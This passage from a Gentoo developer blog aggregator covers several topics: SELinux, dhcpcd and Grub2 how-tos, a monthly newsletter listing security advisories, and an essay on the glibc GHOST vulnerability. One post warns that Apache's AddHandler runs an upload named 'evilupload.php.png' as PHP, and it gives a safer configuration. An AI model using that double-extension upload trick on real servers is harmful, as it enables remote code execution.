Denis Dupeyron a.k.a. calchan (homepage, bugs)
Google Summer of Code 2015 (February 17, 2015, 04:47 UTC)

This is a quick informational message about GSoC 2015.

The Gentoo Foundation is in the process of applying to GSoC 2015 as an organization. This is the 10th year we'll participate in this very successful and exciting program.

Right now, we need you to propose project ideas. You do not need to be a developer to propose an idea. First, open this link in a new tab/window. Change the title My_new_idea in the URL to the actual title, load the page again, fill in all the information and save the article. Then, edit the ideas page and include a link to it. If you need any help with this, or advice regarding the description or your idea, come talk to us in #gentoo-soc on Freenode.

Thanks.

February 15, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Apache AddHandler madness all over the place (February 15, 2015, 21:44 UTC)

Hi!

A friend of mine ran into known (though not well-known) security issues with Apache’s AddHandler directive.
Basically, Apache configuration like

# Avoid!
AddHandler php5-fcgi .php

applies to a file called evilupload.php.png, too. Yes.
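A safer pattern matches only file names that actually end in .php; here is a sketch reusing the handler name from above (the key point is anchoring the expression with $):

<FilesMatch "\.php$">
    SetHandler php5-fcgi
</FilesMatch>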
Looking at the current Apache documentation, I would expect it to clearly say that AddHandler should not be used any more, for security reasons. What I find as of 2015-02-15 looks different:

Maybe that’s why AddHandler is still proposed all across the Internet:

And maybe that’s why it made its way into app-admin/eselect-php (bug #538822).

Please join the fight. Time to get AddHandler off the Internet!

I ❤ Free Software 2015-02-14 (February 15, 2015, 20:19 UTC)

I’m late. So what :)

I love Free Software!

Sven Vermeulen a.k.a. swift (homepage, bugs)
CIL and attributes (February 15, 2015, 13:49 UTC)

I keep on struggling to remember this, so let’s make a blog post out of it ;-)

When the SELinux policy is being built, recent userspace (2.4 and higher) will convert the policy into CIL language, and then build the binary policy. When the policy supports type attributes, these are of course also made available in the CIL code. For instance the admindomain attribute from the userdomain module:

...
(typeattribute admindomain)
(typeattribute userdomain)
(typeattribute unpriv_userdomain)
(typeattribute user_home_content_type)

Interfaces provided by the module are also applied. You won’t find the interface CIL code in /var/lib/selinux/mcs/active/modules though; the code at that location is already “expanded” and filled in. So for the sysadm_t domain we have:

# Equivalent of
# gen_require(`
#   attribute admindomain;
#   attribute userdomain;
# ')
# typeattribute sysadm_t admindomain;
# typeattribute sysadm_t userdomain;

(typeattributeset cil_gen_require admindomain)
(typeattributeset admindomain (sysadm_t ))
(typeattributeset cil_gen_require userdomain)
(typeattributeset userdomain (sysadm_t ))
...

However, when checking which domains use the admindomain attribute, notice the following:

~# seinfo -aadmindomain -x
ERROR: Provided attribute (admindomain) is not a valid attribute name.

But don’t panic – this has a reason: as long as there is no SELinux rule applied towards the admindomain attribute, then the SELinux policy compiler will drop the attribute from the final policy. This can be confirmed by adding a single, cosmetic rule, like so:

## allow admindomain admindomain:process sigchld;

~# seinfo -aadmindomain -x
   admindomain
      sysadm_t

So there you go. That does mean that anything that previously relied on the attribute assignation for decisions (like "for each domain assigned the userdomain attribute, do something") will need to make sure that the attribute is really used in a policy rule.

February 14, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Back on-line, finally (February 14, 2015, 23:41 UTC)

The core web services of mine are finally back on-line:

My apologies that it took so long!

I took the occasion of the migration to redirect all traffic on (blog|www).hartwork.org to SSL so that people downloading some of my past Windows binaries (like Winamp plug-in installers) are no longer vulnerable to games like BDFproxy man-in-the-middle.

If you run into anything (still) broken or off-line, please drop me a mail.

Best, Sebastian

February 08, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Have dhcpcd wait before backgrounding (February 08, 2015, 14:50 UTC)

Many of my systems use DHCP for obtaining IP addresses. Even though they all receive a static IP address, this allows me to have them moved over (migrations), use TFTP boot, do cloning (for quick testing), etc. But one of the things that made my efforts somewhat more difficult was that the dhcpcd service continued (the dhcpcd daemon immediately went into the background) even though no IP address had been received yet. Subsequent service scripts that required a working network connection then failed to start.

The solution is to configure dhcpcd to wait for an IP address. This is done through the -w option, or the waitip instruction in the dhcpcd.conf file. With that in place, the service script now waits until an IP address is assigned.
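Either form does the trick (these are the two spellings of the same option mentioned above; pick one):

# in /etc/dhcpcd.conf
waitip

or, when starting the daemon by hand:

~# dhcpcd -w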

February 05, 2015

There has recently been a discussion among developers about the default choice of ffmpeg/libav in Gentoo. Until recently, libav was implicitly the default by being the first dependency of virtual/ffmpeg. Now the choice of libav has been made explicit in the portage profiles, and a news item regarding this was published.

In order to get a data point which might be useful for the discussion, I have created a poll in the forum, where Gentoo users can state their preference about the default:

https://forums.gentoo.org/viewtopic-t-1010096.html

You are welcome to vote in the poll, and if you wish also state your reasons in a comment. However, as the topic of ffmpeg/libav split has been discussed extensively already, I ask you to not restart that discussion in the forum thread.

February 03, 2015
Gentoo Monthly Newsletter: January 2015 (February 03, 2015, 22:00 UTC)

Gentoo News

Council News

One topic addressed in the January council meeting was what happens if a developer wants to join a project and contribute, and sends e-mail to the project or its lead, but no one picks up the phone or answers e-mails there… General agreement was that after applying for project membership and some waiting time without any response, one should just "be bold", add oneself to the project, and start contributing in a responsible fashion.

A second item was the policy for long-term masked packages. Since a mask message is much more visible than, say, a post-installation warning, the decision was that packages with security vulnerabilities may remain in the tree package-masked, assuming there are no replacements for them and they have active maintainers. Naturally, the mask message must clearly spell out the problems with the package.

Unofficial Gentoo Portage Git Mirror

Thanks to Sven Wegener and Michał Górny, we now have an unofficial Gentoo Portage git mirror. Below is the announcement as posted on the mailing lists:

Hello, everyone.

I have the pleasure to announce that the official rsync2git mirror is up and running [1] thanks to
Sven Wegener. It is updated from rsync every 30 minutes, and can be used both to sync your local
Gentoo installs and to submit improvements via pull requests (see README [2] for some details).

At the same time, I have established the 'Git Mirror' [3] project which welcomes developers
willing to help reviewing the pull requests and helping those improvements reach
package maintainers.

For users, this means that we now have a fairly efficient syncing
method and a pull request-based workflow for submitting fixes.
The auto-synced repository can also make proxy-maint workflow easier.

For developers, this either means:

a. if you want to help us, join the team, watch the pull requests.
CC maintainers when appropriate, review, even work towards merging
the changes with approval of the maintainers,

b. if you want to support git users, just wait till we CC you and then review, help, merge :),

c. if you don't want to support git users, just ignore the repo. We'll bother you
directly after the changes are reviewed and ready :).

[1]:https://github.com/gentoo/gentoo-portage-rsync-mirror
[2]:https://github.com/gentoo/gentoo-portage-rsync-mirror#README
[3]:https://wiki.gentoo.org/wiki/Project:Git_mirror
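For the curious, trying out the git-based sync is a single clone away (a sketch; the shallow clone is optional, it just keeps the initial download small):

$ git clone --depth=1 https://github.com/gentoo/gentoo-portage-rsync-mirror.git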

Gentoo Developer Moves

Summary

Gentoo is made up of 246 active developers, of which 36 are currently away.
Gentoo has recruited a total of 807 developers since its inception.

Changes

  • Manuel Rüger joined the python and QA teams
  • Mikle Kolyada joined the PPC team
  • Sergey Popov joined the s390 team and left the Qt team
  • Michał Górny joined the git mirror and overlays teams
  • Mark Wright joined the mathematics and haskell teams
  • Samuel Damashek left the gentoo-keys team
  • Matt Thode left the gentoo-keys team

Additions

Portage

This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 164
Packages 17977
Ebuilds 37150
Architecture Stable Testing Total % of Packages
alpha 3538 676 4214 23.44%
amd64 10889 6598 17487 97.27%
amd64-fbsd 2 1586 1588 8.83%
arm 2681 1869 4550 25.31%
arm64 536 88 624 3.47%
hppa 3107 499 3606 20.06%
ia64 3099 694 3793 21.10%
m68k 600 125 725 4.03%
mips 1 2428 2429 13.51%
ppc 6740 2543 9283 51.64%
ppc64 4308 1064 5372 29.88%
s390 1391 424 1815 10.10%
sh 1504 558 2062 11.47%
sparc 4037 982 5019 27.92%
sparc-fbsd 0 315 315 1.75%
x86 11511 5589 17100 95.12%
x86-fbsd 0 3202 3202 17.81%


Security

No GLSAs were released in January 2015. However, since there was no GMN for December 2014, we include the ones for the previous month as well.

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201412-53 app-crypt/mit-krb5 MIT Kerberos 5: User-assisted execution of arbitrary code 516334
201412-52 net-analyzer/wireshark Wireshark: Multiple vulnerabilities 522968
201412-51 net-misc/asterisk Asterisk: Multiple vulnerabilities 530056
201412-50 net-mail/getmail getmail: Information disclosure 524684
201412-49 app-shells/fish fish: Multiple vulnerabilities 509044
201412-48 sys-apps/file file: Denial of Service 532686
201412-47 sys-cluster/torque TORQUE Resource Manager: Multiple vulnerabilities 372959
201412-46 media-libs/lcms LittleCMS: Denial of Service 479874
201412-45 dev-ruby/facter Facter: Privilege escalation 514476
201412-44 sys-apps/policycoreutils policycoreutils: Privilege escalation 509896
201412-43 app-text/mupdf MuPDF: User-assisted execution of arbitrary code 358029
201412-42 app-emulation/xen Xen: Denial of Service 523524
201412-41 net-misc/openvpn OpenVPN: Denial of Service 531308
201412-40 media-libs/flac FLAC: User-assisted execution of arbitrary code 530288
201412-39 dev-libs/openssl OpenSSL: Multiple vulnerabilities 494816
201412-38 net-misc/icecast Icecast: Multiple Vulnerabilities 529956
201412-37 app-emulation/qemu QEMU: Multiple Vulnerabilities 528922
201412-36 app-emulation/libvirt libvirt: Denial of Service 532204
201412-35 app-admin/rsyslog RSYSLOG: Denial of Service 395709
201412-34 net-misc/ntp NTP: Multiple vulnerabilities 533076
201412-33 net-dns/pdns-recursor PowerDNS Recursor: Multiple vulnerabilities 299942
201412-32 mail-mta/sendmail sendmail: Information disclosure 511760
201412-31 net-irc/znc ZNC: Denial of Service 471738
201412-30 www-servers/varnish Varnish: Multiple vulnerabilities 458888
201412-29 www-servers/tomcat Apache Tomcat: Multiple vulnerabilities 442014
201412-28 dev-ruby/rails Ruby on Rails: Multiple vulnerabilities 354249
201412-27 dev-lang/ruby Ruby: Denial of Service 355439
201412-26 net-misc/strongswan strongSwan: Multiple Vulnerabilities 507722
201412-25 dev-qt/qtgui QtGui: Denial of Service 508984
201412-24 media-libs/openjpeg OpenJPEG: Multiple vulnerabilities 484802
201412-23 net-analyzer/nagios-core Nagios: Multiple vulnerabilities 447802
201412-22 dev-python/django Django: Multiple vulnerabilities 521324
201412-21 www-apache/mod_wsgi mod_wsgi: Privilege escalation 510938
201412-20 gnustep-base/gnustep-base GNUstep Base library: Denial of Service 508370
201412-19 net-dialup/ppp PPP: Information disclosure 519650
201412-18 net-misc/freerdp FreeRDP: User-assisted execution of arbitrary code 511688
201412-17 app-text/ghostscript-gpl GPL Ghostscript: Multiple vulnerabilities 264594
201412-16 dev-db/couchdb CouchDB: Denial of Service 506354
201412-15 app-admin/mcollective MCollective: Privilege escalation 513292
201412-14 media-gfx/xfig Xfig: User-assisted execution of arbitrary code 297379
201412-13 www-client/chromium Chromium: Multiple vulnerabilities 524764
201412-12 sys-apps/dbus D-Bus: Multiple Vulnerabilities 512940
201412-11 app-emulation/emul-linux-x86-baselibs AMD64 x86 emulation base libraries: Multiple vulnerabilities 196865
201412-10 www-apps/egroupware (and 6 more) Multiple packages, Multiple vulnerabilities fixed in 2012 284536
201412-09 games-sports/racer-bin (and 24 more) Multiple packages, Multiple vulnerabilities fixed in 2011 194151
201412-08 dev-util/insight (and 26 more) Multiple packages, Multiple vulnerabilities fixed in 2010 159556
201412-07 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 530692
201412-06 dev-libs/libxml2 libxml2: Denial of Service 525656
201412-05 app-antivirus/clamav Clam AntiVirus: Denial of service 529728
201412-04 app-emulation/libvirt libvirt: Multiple vulnerabilities 483048
201412-03 net-mail/dovecot Dovecot: Denial of Service 509954
201412-02 net-fs/nfs-utils nfs-utils: Information disclosure 464636
201412-01 app-emulation/qemu QEMU: Multiple Vulnerabilities 514680

Package Removals/Additions

Removals

Package Developer Date
app-admin/rudy mrueg 01 Jan 2015
dev-ruby/attic mrueg 01 Jan 2015
dev-ruby/caesars mrueg 01 Jan 2015
dev-ruby/hexoid mrueg 01 Jan 2015
dev-ruby/gibbler mrueg 01 Jan 2015
dev-ruby/rye mrueg 01 Jan 2015
dev-ruby/storable mrueg 01 Jan 2015
dev-ruby/tryouts mrueg 01 Jan 2015
dev-ruby/sysinfo mrueg 01 Jan 2015
dev-perl/MooseX-AttributeHelpers zlogene 01 Jan 2015
dev-db/pgasync titanofold 07 Jan 2015
app-misc/cdcollect pacho 07 Jan 2015
net-im/linpopup pacho 07 Jan 2015
media-gfx/f-spot pacho 07 Jan 2015
media-gfx/truevision pacho 07 Jan 2015
dev-ruby/tmail mrueg 21 Jan 2015
dev-ruby/refe mrueg 21 Jan 2015
dev-ruby/mysql-ruby mrueg 21 Jan 2015
dev-ruby/gem_plugin mrueg 21 Jan 2015
dev-ruby/directory_watcher mrueg 21 Jan 2015
dev-ruby/awesome_nested_set mrueg 21 Jan 2015
app-emacs/cedet ulm 28 Jan 2015
app-vim/svncommand radhermit 30 Jan 2015
app-vim/cvscommand radhermit 30 Jan 2015

Additions

Package Developer Date
dev-ruby/rails-html-sanitizer graaff 01 Jan 2015
dev-ruby/rails-dom-testing graaff 01 Jan 2015
dev-ruby/rails-deprecated_sanitizer graaff 01 Jan 2015
dev-ruby/activejob graaff 01 Jan 2015
app-crypt/gkeys-gen dolsen 01 Jan 2015
dev-haskell/bencode gienah 03 Jan 2015
dev-haskell/torrent gienah 03 Jan 2015
dev-python/PyPDF2 idella4 03 Jan 2015
dev-python/tzlocal floppym 03 Jan 2015
dev-python/APScheduler floppym 03 Jan 2015
app-emacs/dts-mode ulm 03 Jan 2015
dev-python/configargparse radhermit 04 Jan 2015
dev-haskell/setlocale slyfox 04 Jan 2015
dev-haskell/hgettext slyfox 04 Jan 2015
dev-python/parsley mrueg 05 Jan 2015
dev-python/vcversioner mrueg 06 Jan 2015
dev-python/txsocksx mrueg 06 Jan 2015
media-plugins/vdr-rpihddevice hd_brummy 06 Jan 2015
net-misc/chrome-remote-desktop vapier 06 Jan 2015
app-admin/systemrescuecd-x86 mgorny 06 Jan 2015
dev-python/pgasync titanofold 07 Jan 2015
net-proxy/shadowsocks-libev dlan 08 Jan 2015
net-misc/i2pd blueness 08 Jan 2015
games-misc/exult-sound mr_bones_ 09 Jan 2015
kde-frameworks/kpackage mrueg 09 Jan 2015
kde-frameworks/networkmanager-qt mrueg 09 Jan 2015
games-puzzle/ksokoban bircoph 10 Jan 2015
dev-cpp/lucene++ johu 10 Jan 2015
app-emacs/multi-term ulm 10 Jan 2015
dev-java/xml-security ercpe 11 Jan 2015
dev-libs/libtreadstone patrick 13 Jan 2015
dev-libs/utfcpp yac 13 Jan 2015
net-print/epson-inkjet-printer-escpr floppym 15 Jan 2015
dev-cpp/websocketpp johu 16 Jan 2015
sys-apps/systemd-readahead pacho 17 Jan 2015
dev-util/radare2 slyfox 18 Jan 2015
dev-python/wcsaxes xarthisius 18 Jan 2015
net-analyzer/apinger jer 19 Jan 2015
dev-lang/go-bootstrap williamh 20 Jan 2015
media-plugins/vdr-satip hd_brummy 20 Jan 2015
dev-perl/Data-Types chainsaw 20 Jan 2015
dev-perl/DateTime-Tiny chainsaw 20 Jan 2015
dev-perl/MongoDB chainsaw 20 Jan 2015
dev-python/paramunittest alunduil 21 Jan 2015
dev-python/mando alunduil 21 Jan 2015
dev-python/radon alunduil 21 Jan 2015
sci-geosciences/opencpn-plugin-br24radar mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-climatology mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-launcher mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-logbookkonni mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-objsearch mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-ocpndebugger mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-statusbar mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-weatherfax mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-weather_routing mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-wmm mschiff 21 Jan 2015
dev-python/elasticsearch-py vapier 22 Jan 2015
dev-php/ming-php grknight 22 Jan 2015
app-portage/cpuinfo2cpuflags mgorny 23 Jan 2015
dev-ruby/spy mrueg 24 Jan 2015
dev-ruby/power_assert graaff 25 Jan 2015
dev-ruby/vcr graaff 25 Jan 2015
dev-util/trace-cmd chutzpah 27 Jan 2015
net-libs/iojs patrick 27 Jan 2015
dev-python/bleach radhermit 27 Jan 2015
dev-python/readme radhermit 27 Jan 2015
www-client/vivaldi jer 27 Jan 2015
media-libs/libpagemaker jlec 27 Jan 2015
dev-python/jenkinsapi idella4 28 Jan 2015
dev-python/httmock idella4 28 Jan 2015
dev-python/jenkins-webapi idella4 29 Jan 2015
sec-policy/selinux-git perfinion 29 Jan 2015
x11-drivers/xf86-video-opentegra chithanh 29 Jan 2015
dev-java/cssparser monsieurp 30 Jan 2015
app-emulation/docker-compose alunduil 31 Jan 2015
dev-python/oslo-context prometheanfire 31 Jan 2015
dev-python/oslo-middleware prometheanfire 31 Jan 2015
dev-haskell/tasty-kat qnikst 31 Jan 2015
dev-perl/Monitoring-Plugin mjo 31 Jan 2015

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 January 2015 and 31 January 2015. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
[Chart: Bugzilla bug activity, January 2015]

Bug Activity Number
New 2113
Closed 1058
Not fixed 182
Duplicates 150
Total 6525
Blocker 3
Critical 16
Major 62

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period.

Rank Team/Developer Bug Count
1 Gentoo Perl team 66
2 Gentoo Linux Gnome Desktop Team 66
3 Python Gentoo Team 44
4 Gentoo Games 42
5 Gentoo KDE team 34
6 Default Assignee for Orphaned Packages 27
7 Gentoo's Haskell Language team 26
8 Gentoo Security 22
9 Gentoo Ruby Team 22
10 Others 708

[Chart: closed bug ranking, January 2015]

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Security 106
2 Gentoo Linux bug wranglers 103
3 Gentoo Perl team 72
4 Gentoo Games 72
5 Python Gentoo Team 66
6 Gentoo Linux Gnome Desktop Team 66
7 Gentoo's Haskell Language team 65
8 Default Assignee for Orphaned Packages 54
9 Java team 53
10 Others 1455

[Chart: opened bug ranking, January 2015]

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

February 02, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Mozilla: Hating you so you don't have to (February 02, 2015, 02:33 UTC)

Ahem. I'm mildly amused: Firefox 35 shows me this nice little informational message in the "Get addons" view:

Secure Connection Failed

An error occurred during a connection to services.addons.mozilla.org. 
Peer's Certificate has been revoked. (Error code: sec_error_revoked_certificate) 
Oh well. Why was I looking at that anyway? Well, for some reason I've had adb (android thingy) running on my desktop. Which makes little sense ... but ... find tells me:
./.mozilla/firefox/badrandomvalue.default/extensions/adbhelper@mozilla.org/linux64/adb
So now there's a random service running *when I start firefox* because ... err, I might want to "test, deploy and debug HTML5 web apps on Firefox OS phones & Simulator, directly from Firefox browser."
Which I don't. But I appreciate having extra crap default-enabled for no reason. Sigh.
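(If you want it gone, deleting the bundled extension from the profile directory should do the trick; a sketch, since the profile directory name varies per install:)

rm -rf ~/.mozilla/firefox/*.default/extensions/adbhelper@mozilla.org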

Mozilla: We hate you so you don't have to

January 31, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Choice included (January 31, 2015, 17:35 UTC)

Some time ago, Matteo Pescarin created the great "Gentoo Abducted" design. Here are, after some minor doodling for the fun of it, several A0 posters based on that design, pointing out the excellent features of Gentoo. Released under CC BY-SA 2.5 as the original. Enjoy!



[Five poster images; each design is available as a PDF and an SVG download.]

Sebastian Pipping a.k.a. sping (homepage, bugs)
Switching to Grub2 on Gentoo (January 31, 2015, 17:26 UTC)

Hi!

There seem to be quite a number of people who are “afraid” of Grub2 because of its “no single file” approach. From more and more people I hear about sticking to Grub legacy or moving to syslinux rather than upgrading to Grub2.

I used to be one of those not too long ago: I’ve been sticking to Grub legacy for quite a while, mainly because I never felt like breaking a booting system at that very moment. I have finally upgraded my Gentoo dev machine to Grub2 now and I’m rather happy with the results:

  • No manual editing of Grub2 config files for kernel upgrades any more
  • The Grub2 rescue shell, if I should break things
  • Fancy theming if I feel like that next week
  • I am off more or less unmaintained software

My steps to upgrade were:

1. Install sys-boot/grub:2.

2. Inspect the output of “sudo grub2-mkconfig” (which goes to stdout) to get a feeling for it.

3. Tune /etc/default/grub a bit:

GRUB_DEFAULT=0
GRUB_TIMEOUT=5

# This is genkernel
GRUB_CMDLINE_LINUX="dolvm dokeymap keymap=de
    crypt_root=UUID=00000000-0000-0000-0000-000000000000
    real_root=/dev/gentoo/root noslowusb"

# A bit retro, works with and without external display
GRUB_GFXMODE=640x480

GRUB_BACKGROUND="/boot/grub/gentoo-cow-gdm-remake-640x480.png"

NOTE: I broke the GRUB_CMDLINE_LINUX line for readability only.

4. Insert a “shutdown” menu entry at /etc/grub.d/40_custom:

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries.  Simply type the
# menu entries you want to add after this comment.  Be careful not to change
# the 'exec tail' line above.

menuentry "Shutdown" {
        halt
}

5. Run “sudo grub2-mkconfig -o /boot/grub/grub.cfg“.

6. Run “sudo grub2-install /dev/disk/by-id/ata-HITACHI_000000000000000_00000000000000000000“.

Using /dev/disk/ greatly reduces the risk of installing to the wrong disk.
Check “find /dev/disk | xargs ls -ld“.
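If in doubt, a tiny helper like this (a sketch; it takes the kernel device name, e.g. “sda”, as its argument) prints the by-id aliases that point at a given disk:

#!/bin/sh
# Usage: ./by-id-of.sh sda
# Print every /dev/disk/by-id symlink that resolves to /dev/$1.
for link in /dev/disk/by-id/*; do
    [ "$(readlink -f "$link")" = "/dev/$1" ] && echo "$link"
done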

7. Reboot

Done.

For kernel updates, my new process is

emerge -auv sys-kernel/vanilla-sources

pushd /usr/src
cp linux-3.18.3/.config linux-3.18.4/

# yes, sys-kernel/vanilla-sources[symlink] would do that for me
rm linux
ln -s linux-3.18.4 linux

pushd linux
yes '' | make oldconfig

make -j4 && make modules_install install \
		&& emerge tp_smapi \
		&& genkernel initramfs \
		&& grub2-mkconfig -o /boot/grub/grub.cfg

popd
popd

Best, Sebastian

January 29, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

GHOST

On Tuesday details about the security vulnerability GHOST in Glibc were published by the company Qualys. When severe security vulnerabilities hit the news I always like to take this as a chance to learn what can be improved and how to avoid similar incidents in the future (see e.g. my posts on Heartbleed/Shellshock, POODLE/BERserk and NTP lately).

GHOST itself is a heap overflow in the name resolution function of the Glibc. The Glibc is the standard C library on Linux systems; almost every piece of software that runs on a Linux system uses it. It is somewhat unclear right now how serious GHOST really is. A lot of software uses the affected function gethostbyname(), but a lot of conditions have to be met to make this vulnerability exploitable. Right now the most relevant attack is against the mail server Exim, for which Qualys has developed a working exploit that they plan to release soon. There have been speculations whether GHOST might be exploitable through WordPress, which would make it much more serious.

Technically GHOST is a heap overflow, which is a very common bug in C programming. C is inherently prone to these kinds of memory corruption errors and there are essentially two things here to move forwards: Improve the use of exploit mitigation techniques like ASLR and create new ones (levee is an interesting project, watch this 31C3 talk). And if possible move away from C altogether and develop core components in memory safe languages (I have high hopes for the Mozilla Servo project, watch this linux.conf.au talk).

GHOST was discovered three times

But the thing I want to elaborate on here is something different about GHOST: It turns out that it has been discovered independently three times. It was already fixed in 2013 in the Glibc code itself. The commit message didn't indicate that it was a security vulnerability. Then in early 2014 developers at Google found it again using Address Sanitizer (which – by the way – tells you that all software developers should use Address Sanitizer more often to test their software). Google fixed it in Chrome OS and explicitly called it an overflow and a vulnerability. And then recently Qualys found it again and made it public.

Now you may wonder why a vulnerability fixed in 2013 made headlines in 2015. The reason is that it widely wasn't fixed because it wasn't publicly known that it was serious. I don't think there was any malicious intent. The original Glibc fix was probably done without anyone noticing that it is serious and the Google devs may have thought that the fix is already public, so they don't need to make any noise about it. But we can clearly see that something doesn't work here. Which brings us to a discussion how the Linux and free software world in general and vulnerability management in particular work.

The “Never touch a running system” principle

Quite early when I came in contact with computers I heard the phrase “Never touch a running system”. This may have been a reasonable approach to IT systems back then when computers usually weren't connected to any networks and when remote exploits weren't a thing, but it certainly isn't a good idea today in a world where almost every computer is part of the Internet. Because once new security vulnerabilities become public you should change your system and fix them. However that doesn't change the fact that many people still operate like that.

A number of Linux distributions provide “stable” or “Long Time Support” versions. Basically the idea is this: At some point they take the current state of their systems and further updates will only contain important fixes and security updates. They guarantee to fix security vulnerabilities for a certain time frame. This is kind of a compromise between the “Never touch a running system” approach and reasonable security. It tries to give you a system that will basically stay the same, but you get fixes for security issues. Popular examples for this approach are the stable branch of Debian, Ubuntu LTS versions and the Enterprise versions of Red Hat and SUSE.

To give you an idea about time frames: Debian currently supports the stable trees Squeeze (6.0), released in 2011, and Wheezy (7.0), released in 2013. Red Hat Enterprise Linux currently has 4 supported versions (4, 5, 6, 7); the oldest one was originally released in 2005. So we're talking about pretty long time frames for which these systems get supported. Ubuntu and SUSE have similarly long-supported systems.

These systems are delivered with an implicit promise: We will take care of security, and if you update regularly you'll have a system that doesn't change much, but that will be secure against known threats. Now the interesting question is: How well do these systems deliver on that promise, and how hard is that?

Vulnerability management is chaotic and fragile

I'm not sure how many people are aware how vulnerability management works in the free software world. It is a pretty fragile and chaotic process. There is no standard way things work. The information is scattered around many different places. Different people look for vulnerabilities for different reasons. Some are developers of the respective projects themselves, some are companies like Google that make use of free software projects, some are just curious people interested in IT security or researchers. They report a bug through the channels of the respective project. That may be a mailing list, a bug tracker or just a direct mail to the developer. Hopefully the developers fix the issue. It does happen that the person finding the vulnerability first has to explain to the developer why it actually is a vulnerability. Sometimes the fix will happen in a public code repository, sometimes not. Sometimes the developer will mention that it is a vulnerability in the commit message or the release notes of the new version, sometimes not. There are notorious projects that refuse to handle security vulnerabilities in a transparent way. Sometimes whoever found the vulnerability will post more information on his/her blog or on a mailing list like full disclosure or oss-security. Sometimes not. Sometimes vulnerabilities get a CVE id assigned, sometimes not.

Add to that the fact that in many cases it's far from clear what is a security vulnerability. It is absolutely common that if you ask the people involved whether this is serious the best and most honest answer they can give is “we don't know”. And very often bugs get fixed without anyone noticing that it even could be a security vulnerability.

Then there are projects where the number of security vulnerabilities found and fixed is really huge. The latest Chrome 40 release had 62 security fixes, version 39 had 42. Chrome releases a new version every two months. Browser vulnerabilities are found and fixed on a daily basis. Not that extreme but still high is the vulnerability count in PHP, which is especially worrying if you know that many webhosting providers run PHP versions not supported any more.

So you probably see my point: There is a very chaotic stream of information in various different places about bugs and vulnerabilities in free software projects. The number of vulnerabilities is huge. Making a promise that you will scan all this information for security vulnerabilities and backport the patches to your operating system is a big promise. And I doubt anyone can fulfill that.

GHOST is a single example, so you might ask how often these things happen. At some point right after GHOST became public this excerpt from the Debian Glibc changelog caught my attention (excuse the bad quality, had to take the image from Twitter because I was unable to find that changelog on Debian's webpages):

[Image: excerpt from the Debian eglibc changelog]

What you can see here: While Debian fixed GHOST (which is CVE-2015-0235) they also fixed CVE-2012-6656 – a security issue from 2012. Admittedly this is a minor issue, but it's a vulnerability nevertheless. A quick look at the Debian changelog of Chromium both in squeeze and wheezy will tell you that they aren't fixing all the recent security issues in it. (Debian already had discussions about removing Chromium and in Wheezy they don't stick to a single version.)

It would be an interesting (and time consuming) project to take a package like PHP and check for all the security vulnerabilities whether they are fixed in the latest packages in Debian Squeeze/Wheezy, all Red Hat Enterprise versions and other long term support systems. PHP is probably more interesting than browsers, because the high profile targets for these vulnerabilities are servers. What worries me: I'm pretty sure some people already do that. They just won't tell you and me, instead they'll write their exploits and sell them to repressive governments or botnet operators.

Then there are also stories like this: Tavis Ormandy reported a security issue in Glibc in 2012 and the people from Google's Project Zero went to great lengths to show that it is actually exploitable. Reading the Glibc bug report you can learn that this was already reported in 2005(!), just nobody noticed back then that it was a security issue and it was minor enough that nobody cared to fix it.

There are also bugs that require changes so big that backporting them is essentially impossible. In the TLS world a lot of protocol bugs have been highlighted in recent years. Take Lucky Thirteen for example. It is a timing sidechannel in the way the TLS protocol combines the CBC encryption, padding and authentication. I like to mention this bug because I like to quote it as the TLS bug that was already mentioned in the specification (RFC 5246, page 23: "This leaves a small timing channel"). The real fix for Lucky Thirteen is not to use the erratic CBC mode any more and switch to authenticated encryption modes which are part of TLS 1.2. (There's another possible fix which is using Encrypt-then-MAC, but it is hardly deployed.) Up until recently most encryption libraries didn't support TLS 1.2. Debian Squeeze and Red Hat Enterprise 5 ship OpenSSL versions that only support TLS 1.0. There is no trivial patch that could be backported, because this is a huge change. What they likely backported are workarounds that avoid the timing channel. This will stop the attack, but it is not a very good fix, because it keeps the problematic old protocol and will force others to stay compatible with it.

LTS and stable distributions are there for a reason

The big question is of course what to do about it. OpenBSD developer Ted Unangst wrote a blog post yesterday titled Long term support considered harmful, I suggest you read it. He argues that we should get rid of long term support completely and urge users to upgrade more often. OpenBSD has a 6 month release cycle and supports two releases, so one version gets supported for one year.

Given what I wrote before you may think that I agree with him, but I don't. While I personally always avoided using too old systems – I'm usually using Gentoo, which doesn't have any snapshot releases at all and does rolling releases – I can see the value in long term support releases. There are a lot of systems out there – connected to the Internet – that are never updated. Taking away the option to install systems and let them run with relatively little maintenance overhead over several years will probably result in more systems never receiving any security updates. With all its imperfectness, running a Debian Squeeze with the latest updates is certainly better than running an operating system from 2011 that stopped getting security fixes in 2012.

Improving the information flow

